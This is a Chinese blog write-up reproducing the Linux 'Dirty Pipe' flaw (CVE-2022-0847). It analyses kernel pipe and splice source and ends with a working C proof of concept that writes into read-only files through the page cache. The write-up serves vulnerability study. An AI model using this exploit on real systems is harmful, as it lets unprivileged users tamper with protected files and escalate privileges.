CVE-2022-0847漏洞复现

CVE-2022-0847漏洞复现

page cache

首先取自linux官方文档对于page cache的解释

物理内存是易失性的,将数据导入内存的常见情况是从文件中读取数据。每当读取文件时,数据都会放入page cache中,以避免在后续读取时进行昂贵的磁盘访问。同样,当写入文件时,数据被放置在page cache中,并最终进入后备存储设备。写入的页面被标记为脏页面,当 Linux 决定将它们重用于其他目的时,它会确保将设备上的文件内容与更新的数据同步。

pipe系列

在我们申请到一个pipe管道后,他们在内存当中大致呈以下局面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
                                                         struct file
+----------------+
| |
+--------->| |
| +----------------+
| | *private_data +-----------------------------------+
| | | |
| +----------------+ |
| +----+ *f_op | |
| | | | |
| | +----------------+ |
Userland | | | *f_inode +--+ | struct pipe_inode_info
| | | | | |
+-----------------+-----------------+ | | +----------------+ | struct inode | +------------+
| fd[0] | files[0] +-----+ | | | +-->+------------+ +------->| | +-------------+
| | read | | +----------------+ | | *i_op +----+ | +------------+ +--->| pipe_buffer |
+-----------------+-----------------+ | | | | | | | | | +-------------+
| fd[1] | files[1] +-----+ | | +------------+ | | +------------+ | | pipe_buffer |
| | write | | | struct file | | ...... | | | | | | +-------------+
+-----------------+-----------------+ | | +----------------+ | | | | | +------------+ | | ........... |
+-----|--->| | | +------------+ | | | *bufs +------+ +-------------+
| | | | | i_pipe +----|----------+ +------------+ | pipe_buffer |
| +----------------+ | | | | | | +-------------+
| | *private_data | | +------------+ | +------------+
| | | | | ...... | | +------------+
| +----------------+ | | | |
+----+ *f_op | | +------------+ |
| | | | |
| +----------------+ | | +------------------------------------------------+
| | *f_inode | | | | const struct file_operations pipefifo_fops = { |
| | +--+ | | .open = fifo_open, |
| +----------------+ | | .llseek = no_llseek, |
| | | | | .read_iter = pipe_read, |
| +----------------+ +-----+------------+ .write_iter = pipe_write, |
| | | .poll = pipe_poll, |
| | | .unlocked_ioctl = pipe_ioctl, |
| | | .release = pipe_release, |
| | | .fasync = pipe_fasync, |
| | | .splice_write = iter_file_splice_write, |
+----------------------------------------+ | }; |
+------------------------------------------------+

pipe_inode_info

位于 fs/pipe.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
58 struct pipe_inode_info {
59 struct mutex mutex;
60 wait_queue_head_t rd_wait, wr_wait;
61 unsigned int head; //写入pipe时所指向的bufs的下标
62 unsigned int tail; //读出pipe时所指向的bufs的下标
63 unsigned int max_usage; //bufs最多包含的pipe_buffer
64 unsigned int ring_size; //目前总共的pipe_buffer数量,默认0x10,可以通过fcntl(F_SETPIPE_SZ)进行修改,但是需为2的幂次
65 #ifdef CONFIG_WATCH_QUEUE
66 bool note_loss;
67 #endif
68 unsigned int nr_accounted;
69 unsigned int readers; //目前读者数目
70 unsigned int writers; //目前写者数目
71 unsigned int files; //映射到该pipe_inode_info的file数目
72 unsigned int r_counter;
73 unsigned int w_counter;
74 unsigned int poll_usage;
75 struct page *tmp_page;
76 struct fasync_struct *fasync_readers;
77 struct fasync_struct *fasync_writers;
78 struct pipe_buffer *bufs; //struct pipe_buffer数组
79 struct user_struct *user; //创建该pipe的用户
80 #ifdef CONFIG_WATCH_QUEUE
81 struct watch_queue *watch_queue;
82 #endif
83 };

pipefifo_fops

位于 fs/pipe.c,这里是pipe管道文件对应的虚函数表

1
2
3
4
5
6
7
8
9
10
11
1218 const struct file_operations pipefifo_fops = {
1219 .open = fifo_open,
1220 .llseek = no_llseek,
1221 .read_iter = pipe_read,
1222 .write_iter = pipe_write,
1223 .poll = pipe_poll,
1224 .unlocked_ioctl = pipe_ioctl,
1225 .release = pipe_release,
1226 .fasync = pipe_fasync,
1227 .splice_write = iter_file_splice_write,
1228 };

pipe_write

一步一步分析pipe_write

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
415 static ssize_t
416 pipe_write(struct kiocb *iocb, struct iov_iter *from)
417 {
418 struct file *filp = iocb->ki_filp;
419 struct pipe_inode_info *pipe = filp->private_data;
420 unsigned int head;
421 ssize_t ret = 0;
422 size_t total_len = iov_iter_count(from);
423 ssize_t chars;
424 bool was_empty = false;
425 bool wake_next_writer = false;
......
446 /*
447 * If it wasn't empty we try to merge new data into
448 * the last buffer.
449 *
450 * That naturally merges small writes, but it also
451 * page-aligns the rest of the writes for large writes
452 * spanning multiple pages.
453 */
454 head = pipe->head;
455 was_empty = pipe_empty(head, pipe->tail); //判断pipe是否现在内容为空
456 chars = total_len & (PAGE_SIZE-1); //total_len为我们想总共写入的字节数
457 if (chars && !was_empty) { //当为空就不会走这里,这里是如果本次指向的head还有空闲空间,则会用它来进行写入
458 unsigned int mask = pipe->ring_size - 1;
459 struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
460 int offset = buf->offset + buf->len; //偏移是指该pipe_buffer所指向的page页面中的偏移,这里再加上len就可以得到即将写入的位置
461
462 if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
463 offset + chars <= PAGE_SIZE) {
464 ret = pipe_buf_confirm(pipe, buf);
465 if (ret)
466 goto out;
467
468 ret = copy_page_from_iter(buf->page, offset, chars, from);
469 if (unlikely(ret < chars)) {
470 ret = -EFAULT;
471 goto out;
472 }
473
474 buf->len += ret; //这里将len+我们刚刚写入的值
475 if (!iov_iter_count(from))
476 goto out;
477 }
478 }

简述一下上面的步骤:

  1. 检查整个pipe所指向buffer的空间,这里检查我们想要传入的总字节数 total_size,然后计算 chars,这里是总字节相对于pagesize取余数
  2. 这里来判断offset + chars会不会超过该head buffer所指向的页面界限,并且判断buf->flags是否带有 PIPE_BUF_FLAG_CAN_MERGE参数,满足两个条件就进行下面buffer的复制

然后如果没有进行一个初始的边角料拷贝,或者说拷完了,下面的代码继续运行,是一个大的for循环

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
480     for (;;) {
481 if (!pipe->readers) {
482 send_sig(SIGPIPE, current, 0);
483 if (!ret)
484 ret = -EPIPE;
485 break;
486 }
487
488 head = pipe->head;
/* 查看是否bufs是否已经用完,为用完则进入if的内容,否则跳过过 */
489 if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
490 unsigned int mask = pipe->ring_size - 1;
491 struct pipe_buffer *buf = &pipe->bufs[head & mask]; //获取写入的bufs数组下标
492 struct page *page = pipe->tmp_page;
493 int copied;
494
495 if (!page) {
496 page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); //如果pipe没有cache页面,则分配
497 if (unlikely(!page)) {
498 ret = ret ? : -ENOMEM;
499 break;
500 }
501 pipe->tmp_page = page;
502 }
503
504 /* 在 bufs ring中分配一个slot并且连接在空的pipe_buffer上
505 * If we fault or otherwise fail to use
506 * it, either the reader will consume it or it'll still
507 * be there for the next write.
508 */
509 spin_lock_irq(&pipe->rd_wait.lock);
510
511 head = pipe->head;
512 if (pipe_full(head, pipe->tail, pipe->max_usage)) {
513 spin_unlock_irq(&pipe->rd_wait.lock);
514 continue;
515 }
516
517 pipe->head = head + 1;
518 spin_unlock_irq(&pipe->rd_wait.lock);
519
520 /* Insert it into the buffer array */
521 buf = &pipe->bufs[head & mask];
522 buf->page = page;
523 buf->ops = &anon_pipe_buf_ops; //pipe_buffer的回调函数
524 buf->offset = 0;
525 buf->len = 0;
526 if (is_packetized(filp)) //查看是否设置文件的flags O_DIRECT
527 buf->flags = PIPE_BUF_FLAG_PACKET;
528 else
529 buf->flags = PIPE_BUF_FLAG_CAN_MERGE; //未设置则置该标志位
530 pipe->tmp_page = NULL;
531
532 copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
533 if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
534 if (!ret)
535 ret = -EFAULT;
536 break;
537 }
538 ret += copied;
539 buf->offset = 0;
540 buf->len = copied;
541
542 if (!iov_iter_count(from))
543 break;
544 }
545 /* 走到这里说明pipe bufs中的page页面用完了 */
546 if (!pipe_full(head, pipe->tail, pipe->max_usage))
547 continue;
548
549 /* Wait for buffer space to become available. */
550 if (filp->f_flags & O_NONBLOCK) {
551 if (!ret)
552 ret = -EAGAIN;
553 break;
554 }
555 if (signal_pending(current)) {
556 if (!ret)
557 ret = -ERESTARTSYS;
558 break;
559 }
560
561 /*
562 * We're going to release the pipe lock and wait for more
563 * space. We wake up any readers if necessary, and then
564 * after waiting we need to re-check whether the pipe
565 * become empty while we dropped the lock.
566 */
567 __pipe_unlock(pipe);
568 if (was_empty)
569 wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
570 kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
571 wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
572 __pipe_lock(pipe);
573 was_empty = pipe_empty(pipe->head, pipe->tail);
574 wake_next_writer = true;
575 }
.......

这里的for循环是整个pipe_write部分的核心,他承担了剩下的大部分拷贝,会不断检查pipe->bufs的充盈程度,一旦有空闲则会申请新的page来拷贝我们用户区传入的数据,这里如果我们创建pipe的时候没有设置标识 O_DIRECT,则会在每个新创建的pipe_buffer->flags置为 PIPE_BUF_FLAG_CAN_MERGE

pipe_read

pipe_read函数大部分就是从上述的环形buffer当中读出数据,然后修改pipe_buffer以及 pipe_inode_info 相对应的部分,值得注意的一点就是其中对于读出完毕的pipe_buffer的flags字段并没有修改,所以当我们pipe_write之后,buf->flags中始终会有该标识位 PIPE_BUF_FLAG_CAN_MERGE

splice系统调用

先看看手册中的描述

splice()  moves  data  between  two file descriptors without copying between kernel address space and user address space.  It transfers up to len bytes of data from the file descriptor fd_in to the file descriptor fd_out, where one of the file descriptors must refer to a pipe.

大致意思是该系统调用将使得两个文件描述符之间的数据复制并不是内核与用户空间这种形式.她至多可以从 fd_in文件描述符当中复制大小为 len的数据至 fd_out,值得注意的是这两个文件描述符中至少需要引用了管道

1
2
3
4
5
6
7
8
9
/* 这里有几条规则是传入参数需要遵守的
* 1.如果fd_in为pipe,则off_in必须要是NULL;
* 2.如果fd_in不是pipe,且off_in是NULL,读取字节将会从file offset开始,读取完毕后进行适当的设置
* 3.如果fd_in不是pipe,且off_in非空,则off_in必须指向一个buffer,该buffer需要满足从开始的偏移到即将从fd_in读入的字节数大小,这样的话fd_in的file offset将不会改变
* ?.上述的fd_in与off_in的规则同样作用于fd_out与off_out
*/
ssize_t splice(int fd_in, off_t *_Nullable off_in,
int fd_out, off_t *_Nullable off_out,
size_t len, unsigned int flags);

似乎是由九种传参组合

fd_in off_in fd_out off_out Right/Wrong
pipe NULL pipe NULL :white_check_mark:
pipe NULL file NULL :white_check_mark:
pipe NULL file buffer :white_check_mark:
file NULL pipe NULL :white_check_mark:
file NULL file NULL :x:
file NULL file buffer :x:
file buffer pipe NULL :white_check_mark:
file buffer file NULL :x:
file buffer file buffer :x:

由于有着至少一个pipe的规定,所以最终能正确执行的就只有五种情况

然后我们来看系统调用源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
1332 SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
1333 int, fd_out, loff_t __user *, off_out,
1334 size_t, len, unsigned int, flags)
1335 {
1336 struct fd in, out;
1337 long error;
1338
1339 if (unlikely(!len))
1340 return 0;
1341
1342 if (unlikely(flags & ~SPLICE_F_ALL))
1343 return -EINVAL;
1344
1345 error = -EBADF;
1346 in = fdget(fd_in);
1347 if (in.file) {
1348 out = fdget(fd_out);
1349 if (out.file) {
1350 error = __do_splice(in.file, off_in, out.file, off_out,
1351 len, flags);
1352 fdput(out);
1353 }
1354 fdput(in);
1355 }
1356 return error;
1357 }

基本没有什么好说的,直接看 __do_splice

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
1116 static long __do_splice(struct file *in, loff_t __user *off_in,
1117 struct file *out, loff_t __user *off_out,
1118 size_t len, unsigned int flags)
1119 {
1120 struct pipe_inode_info *ipipe;
1121 struct pipe_inode_info *opipe;
1122 loff_t offset, *__off_in = NULL, *__off_out = NULL;
1123 long ret;
1124
1125 ipipe = get_pipe_info(in, true);
1126 opipe = get_pipe_info(out, true);
1127
1128 if (ipipe && off_in)
1129 return -ESPIPE;
1130 if (opipe && off_out)
1131 return -ESPIPE;
1132 /* 由上面的规律统计可知,这里我们至多只会有一个off_*非空,所以不用担心重写入的问题 */
1133 if (off_out) {
1134 if (copy_from_user(&offset, off_out, sizeof(loff_t))) //从用户off_out拷贝数据到&offset
1135 return -EFAULT;
1136 __off_out = &offset;
1137 }
1138 if (off_in) {
1139 if (copy_from_user(&offset, off_in, sizeof(loff_t))) //从用户off_in拷贝数据到&offset
1140 return -EFAULT;
1141 __off_in = &offset;
1142 }
1143 /* 这里传入的__off_in和__off_out至多只会有一个指针非空 */
1144 ret = do_splice(in, __off_in, out, __off_out, len, flags);
1145 if (ret < 0)
1146 return ret;
1147
1148 if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t)))
1149 return -EFAULT;
1150 if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t)))
1151 return -EFAULT;
1152
1153 return ret;
1154 }

这里仅仅也只是判断了一下你传递的参数的正确性,然后如果某个off_*不为空,则需要将其拷贝到内核空间 :)

do_splice

然后调用 do_splice函数,该函数比较长,因此我们分开讲解,这里首先分成几种情况,分别是:

  1. in和out均为pipe
  2. in为pipe,out为普通文件
  3. in为普通文件,out为pipe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
1025 /*      
1026 * Determine where to splice to/from.
1027 */
1028 long do_splice(struct file *in, loff_t *off_in, struct file *out,
1029 loff_t *off_out, size_t len, unsigned int flags)
1030 {
1031 struct pipe_inode_info *ipipe;
1032 struct pipe_inode_info *opipe;
1033 loff_t offset;
1034 long ret;
1035
1036 if (unlikely(!(in->f_mode & FMODE_READ) ||
1037 !(out->f_mode & FMODE_WRITE)))
1038 return -EBADF;
1039
1040 ipipe = get_pipe_info(in, true);
1041 opipe = get_pipe_info(out, true);
1042 /* 如果in和out都是pipe */
1043 if (ipipe && opipe) {
1044 if (off_in || off_out) //二段检查
1045 return -ESPIPE;
1046
1047 /* 如果说我们使用pipe的读写文件描述符们来调用splice可能是十分有趣的, 但是就不准就不准就不准 :) */
1048 if (ipipe == opipe)
1049 return -EINVAL;
1050
1051 if ((in->f_flags | out->f_flags) & O_NONBLOCK)
1052 flags |= SPLICE_F_NONBLOCK;
1053
1054 return splice_pipe_to_pipe(ipipe, opipe, len, flags);
1055 }
......

:one: pipe_to_pipe

可以看到上面的do_splice函数碰到两个pipe,则会调用 splice_pipe_to_pipe函数,该函数主要是复制了pipe_buffer,将inpipe的pipe_buffer内容复制给了outpipe的pipe_buffer,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
1434 /* 
1435 * Splice contents of ipipe to opipe.
1436 */
1437 static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
1438 struct pipe_inode_info *opipe,
1439 size_t len, unsigned int flags)
1440 {
1441 struct pipe_buffer *ibuf, *obuf;
1442 unsigned int i_head, o_head;
1443 unsigned int i_tail, o_tail;
1444 unsigned int i_mask, o_mask;
1445 int ret = 0;
1446 bool input_wakeup = false;
.......
1511 ibuf = &ipipe->bufs[i_tail & i_mask];
1512 obuf = &opipe->bufs[o_head & o_mask];
1513
1514 if (len >= ibuf->len) {
1515 /*
1516 * Simply move the whole buffer from ipipe to opipe
1517 */
1518 *obuf = *ibuf;
1519 ibuf->ops = NULL;
1520 i_tail++;
1521 ipipe->tail = i_tail;
1522 input_wakeup = true;
1523 o_len = obuf->len;
1524 o_head++;
1525 opipe->head = o_head;
1526 } else {
1527 /*
1528 * Get a reference to this pipe buffer,
1529 * so we can copy the contents over.
1530 */
1531 if (!pipe_buf_get(ipipe, ibuf)) {
1532 if (ret == 0)
1533 ret = -EFAULT;
1534 break;
1535 }
1536 *obuf = *ibuf;
......

这里我们返回到do_splice,说下一个if判断


注意这里是 do_splice剩下的部分代码,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
1057     if (ipipe) {
1058 if (off_in)
1059 return -ESPIPE;
1060 if (off_out) {
1061 if (!(out->f_mode & FMODE_PWRITE))
1062 return -EINVAL;
1063 offset = *off_out;
1064 } else {
1065 offset = out->f_pos;
1066 }
1067
1068 if (unlikely(out->f_flags & O_APPEND))
1069 return -EINVAL;
1070
1071 ret = rw_verify_area(WRITE, out, &offset, len); //查看是否越界
1072 if (unlikely(ret < 0))
1073 return ret;
1074
1075 if (in->f_flags & O_NONBLOCK)
1076 flags |= SPLICE_F_NONBLOCK;
1077
1078 file_start_write(out);
1079 ret = do_splice_from(ipipe, out, &offset, len, flags);
1080 file_end_write(out);
1081
1082 if (!off_out)
1083 out->f_pos = offset;
1084 else
1085 *off_out = offset;
1086
1087 return ret;
1088 }

:two: pipe_to_file

然后我们查看do_splice_from函数,这是第二种情况的判断

1
2
3
4
5
6
7
762 static long do_splice_from(struct pipe_inode_info *pipe, struct file *out,                                
763 loff_t *ppos, size_t len, unsigned int flags)
764 {
765 if (unlikely(!out->f_op->splice_write))
766 return warn_unsupported(out, "write");
767 return out->f_op->splice_write(pipe, out, ppos, len, flags);
768 }

这里调用到splice_write函数,他在普通文件当中的初始化函数指针指向iter_file_splice_write,大意是将ipipe的即将复制pipe_buffer中指向的page页指针赋值给一个bio_vec数组,他的结构如下:

1
2
3
4
5
32 struct bio_vec {                                                                                           
33 struct page *bv_page;
34 unsigned int bv_len;
35 unsigned int bv_offset;
36 };

然后之后调用vfs_iter_write写入文件buffer

:three: file_to_pipe

然后是最后一部分的do_splice,也是咱们本次漏洞的重点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
 if (opipe) {
1091 if (off_out)
1092 return -ESPIPE;
1093 if (off_in) {
1094 if (!(in->f_mode & FMODE_PREAD))
1095 return -EINVAL;
1096 offset = *off_in;
1097 } else {
1098 offset = in->f_pos;
1099 }
1100
1101 if (out->f_flags & O_NONBLOCK)
1102 flags |= SPLICE_F_NONBLOCK;
1103
1104 ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
1105 if (!off_in)
1106 in->f_pos = offset;
1107 else
1108 *off_in = offset;
1109
1110 return ret;
1111 }
1112
1113 return -EINVAL;
1114 }

直接查看splice_file_to_pipe 调用链,这里有个小知识那就是我们要知道某个文件的ops,我们可以直接去查看<name>_file_operations,其中<name>为我们的文件系统名称,例如ext4等等

1
2
3
4
5
splice_file_to_pipe
do_splice_to
in->f_op->splice_read <==> generic_file_splice_read
call_read_iter
in->f_op->read_iter <==> generic_file_read_iter

好我们链条就先到这里,先查看该函数,下面是内核开发者对该函数作出的解释

This is the “read_iter()” routine for all filesystems that can use the page cache directly.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
2772 generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
2773 {
2774 size_t count = iov_iter_count(iter); //返回iter->count,也就是我们复制的字节数
2775 ssize_t retval = 0;
2776
2777 if (!count)
2778 return 0; /* skip atime */
2779
2780 if (iocb->ki_flags & IOCB_DIRECT) { //看是否文件标识带有O_DIRECT,若有该标识,则绕过cache
2781 struct file *file = iocb->ki_filp;
2782 struct address_space *mapping = file->f_mapping;
2783 struct inode *inode = mapping->host;
2784
2785 if (iocb->ki_flags & IOCB_NOWAIT) {
2786 if (filemap_range_needs_writeback(mapping, iocb->ki_pos,
2787 iocb->ki_pos + count - 1))
2788 return -EAGAIN;
2789 } else {
2790 retval = filemap_write_and_wait_range(mapping,
2791 iocb->ki_pos,
2792 iocb->ki_pos + count - 1);
2793 if (retval < 0)
2794 return retval;
2795 }
2796
2797 file_accessed(file);
2798
2799 retval = mapping->a_ops->direct_IO(iocb, iter);
2800 if (retval >= 0) {
2801 iocb->ki_pos += retval;
2802 count -= retval;
2803 }
2804 if (retval != -EIOCBQUEUED)
2805 iov_iter_revert(iter, count - iov_iter_count(iter));
2806
2807 /*
2808 * Btrfs can have a short DIO read if we encounter
2809 * compressed extents, so if there was an error, or if
2810 * we've already read everything we wanted to, or if
2811 * there was a short read because we hit EOF, go ahead
2812 * and return. Otherwise fallthrough to buffered io for
2813 * the rest of the read. Buffered reads will not work for
2814 * DAX files, so don't bother trying.
2815 */
2816 if (retval < 0 || !count || IS_DAX(inode))
2817 return retval;
2818 if (iocb->ki_pos >= i_size_read(inode))
2819 return retval;
2820 }
2821
2822 return filemap_read(iocb, iter, retval);
2823 }
2824 EXPORT_SYMBOL(generic_file_read_iter);

其中涉及到两个中间变量 iocbiter,他们两个是在generic_file_splice_read当中进行初始化的,下面分别给出初始化步骤:

  • iter

  • iocb

然后我们看到最后调用filemap_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
2642 ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
2643 ssize_t already_read)
2644 {
2645 struct file *filp = iocb->ki_filp; //获取in_file文件
2646 struct file_ra_state *ra = &filp->f_ra;
2647 struct address_space *mapping = filp->f_mapping; //查看文件映射部分
2648 struct inode *inode = mapping->host; //获取in_file对应的inode
2649 struct folio_batch fbatch;
2650 int i, error = 0;
2651 bool writably_mapped;
2652 loff_t isize, end_offset;
2653
...
2661
2662 do {
2663 cond_resched();
2664
2665 /*
2666 * If we've already successfully copied some data, then we
2667 * can no longer safely return -EIOCBQUEUED. Hence mark
2668 * an async read NOWAIT at that point.第一次already_read=0
2669 */
2670 if ((iocb->ki_flags & IOCB_WAITQ) && already_read)
2671 iocb->ki_flags |= IOCB_NOWAIT;
2672
2673 if (unlikely(iocb->ki_pos >= i_size_read(inode)))
2674 break;
2675
2676 error = filemap_get_pages(iocb, iter, &fbatch);
...
2727 copied = copy_folio_to_iter(folio, offset, bytes, iter);
2728
2729 already_read += copied;
2730 iocb->ki_pos += copied;
2731 ra->prev_pos = iocb->ki_pos;
2732
...
2743
2744 file_accessed(filp);
2745
2746 return already_read ? already_read : error;
2747 }
2748 EXPORT_SYMBOL_GPL(filemap_read);

在该函数当中,我们会将数据从page cache复制到管道,这里并没有真正的进行逐字节复制.在一个dowhile的大循环当中,主要通过调用copy_folio_to_iter来复制chunks

这里给出folio发布的官方解释,这样看来folio似乎是一个用来给复合页机制带来的歧义提供的解决办法,但我看到后面似乎并不受欢迎,但是由于现在替代方案较少,所以暂时将就着用吧:)

可以得出一个结论,我们在这里可以大致将folio类比为page,这对我们接下来的理解并没有任何影响,而copy_folio_to_iter实际上也仅仅是调用了copy_page_to_iter

我们来查看copy_page_to_iter函数调用链,根据文件的类型会有以下的情况

1
2
3
copy_page_to_iter
__copy_page_to_iter
copy_page_to_iter_pipe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
382 static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
383 struct iov_iter *i)
384 {
385 struct pipe_inode_info *pipe = i->pipe;
386 struct pipe_buffer *buf;
387 unsigned int p_tail = pipe->tail;
388 unsigned int p_mask = pipe->ring_size - 1;
389 unsigned int i_head = i->head;
390 size_t off;
391
392 if (unlikely(bytes > i->count))
393 bytes = i->count;
394
395 if (unlikely(!bytes))
396 return 0;
397
398 if (!sanity(i))
399 return 0;
400
401 off = i->iov_offset;
402 buf = &pipe->bufs[i_head & p_mask]; //获取pipe的head指向的pipe_buffer
403 if (off) {
404 if (offset == off && buf->page == page) {
405 /* merge with the last one */
406 buf->len += bytes;
407 i->iov_offset += bytes;
408 goto out;
409 }
410 i_head++;
411 buf = &pipe->bufs[i_head & p_mask];
412 }
413 if (pipe_full(i_head, p_tail, pipe->max_usage))
414 return 0;
415
416 buf->ops = &page_cache_pipe_buf_ops;
417 // buf->flags = 0; 这里需要我们手动将该行注释掉,然后再编译内核
418 get_page(page);
419 buf->page = page;
420 buf->offset = offset;
421 buf->len = bytes;
422
423 pipe->head = i_head + 1;
424 i->iov_offset = offset + bytes;
425 i->head = i_head;
426 out:
427 i->count -= bytes;
428 return bytes;
429 }

我们可以看到这里并没有发生实际上的数据拷贝,而仅仅是page页面指针的改写,当文章写到这里我发现5.17.9的linux内核此时已经将该漏洞进行修复,所以这里我手动将其恢复到漏洞版本

漏洞利用

我们现在知道了漏洞点,那就是在我们使用splice系统调用来进行零拷贝时,从file拷贝到pipe其中的一个buff中时并没有修改其中的标识位,也就是pipe_buffer->flag位,
此时如果flag位存在PIPE_BUF_FLAG_CAN_MERGE,那么我们下次在写入该buffer的时候将从该pipe_buffer的offset+len开始写,但是此时注意,经过splice的零拷贝,我们的pipe_buffer是指向的pagecache的,所以这里导致我们可以直接修改pagecache当中的页面,且根本不会去考虑是否为可写,

所以本次漏洞利用分为以下几个步骤:

  1. 分配pipe以及其中的buffer
  2. 首先向其中灌入大量无意义数据,再依次排空,由于读并不会修改我们的标识,所以这样使得我们每个pipe_buffer都会带有PIPE_BUF_FLAG_CAN_MERGE标识
  3. splice系统调用,将不可写的文件数据内容”拷贝”到pipe当中
  4. 我们将对于pipe的写转化为了对于不可写文件所映射到的pagecache的写

下面是漏洞的poc以及演示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000

void initial_pipe(int *my_pipe);
void fill_pipe(int *my_pipe);
void drain_pipe(int *my_pipe);
void free_env(int *my_pipe);

void debug(){
printf("[\033[5;33m!\033[0m]\033[32mDebugging Here\033[0m\n");
getchar();
}

int main(int argc, char ** argv)
{
int my_pipe[2] = {0};
int fd_read = 0;
char buf[0x10] = {'\x00'};
struct stat file_st;
uint64_t offset = 0;

if(argc < 4){
printf("[x]The poc's right use is: \n<our_poc> <vuln_file> <offset> <payload>\n");
puts("[?]len < 0 will read the hole file...");
exit(1);
}
puts("[+]Initial the pipe...");
initial_pipe(my_pipe);

puts("[+]Fill the pipe...");
fill_pipe(my_pipe);

puts("[+]drain the pipe...");
drain_pipe(my_pipe);

fd_read = open(argv[1], O_RDONLY);

if(fd_read < 0){
perror("open vuln file failed!");
exit(1);
}
if(fstat(fd_read, &file_st) < 0){
perror("stat file failed!");
exit(1);
}

if(argv[2] > 0)
offset = atoi(argv[2]);
else
offset = file_st.st_size;
printf("%d\n", offset);
if(splice(fd_read, (uint64_t *)&offset, my_pipe[1], NULL, 1, 0) < 0){
perror("splice fd to pipe");
exit(1);
}
puts("[+]We successfully execute the splice...");
if(write(my_pipe[1], argv[3], sizeof(argv[3])) < 0){
perror("write failed");
exit(1);
}

free_env(my_pipe);
close(fd_read);
return 0;
}


void initial_pipe(int *my_pipe){
pipe(my_pipe);
fcntl(my_pipe[1], F_SETPIPE_SZ, 1*PAGE_SIZE);
}

void fill_pipe(int *my_pipe){
int pipe_size = fcntl(my_pipe[1], F_GETPIPE_SZ);
int nr = 0;
printf("[*]pipe_size is %d\n", pipe_size);
char buffer[PAGE_SIZE] = {0};
memset(buffer, 0x41, sizeof(buffer));
for(;pipe_size > 0; pipe_size -= nr)
nr = write(my_pipe[1], buffer, (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size));
printf("[*]Fill the pipe done...\n");
}

void drain_pipe(int *my_pipe){
int pipe_size = fcntl(my_pipe[1], F_GETPIPE_SZ);
int nr = 0;
printf("[*]pipe_size is %d\n", pipe_size);
char buffer[PAGE_SIZE] = {0};
for(;pipe_size > 0; pipe_size -= nr)
nr = read(my_pipe[0], buffer, (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size));
printf("[*]Drain the pipe done...\n");
}

void free_env(int *pipe){
/* 1. Free the pipe */
close(pipe[0]);
close(pipe[1]);
}

参考

洞主原文章

精彩复现

folio是甚么


CVE-2022-0847漏洞复现
https://peiandhao.github.io/2024/05/15/CVE-2022-0847漏洞复现/
作者
peiwithhao
发布于
2024年5月15日
许可协议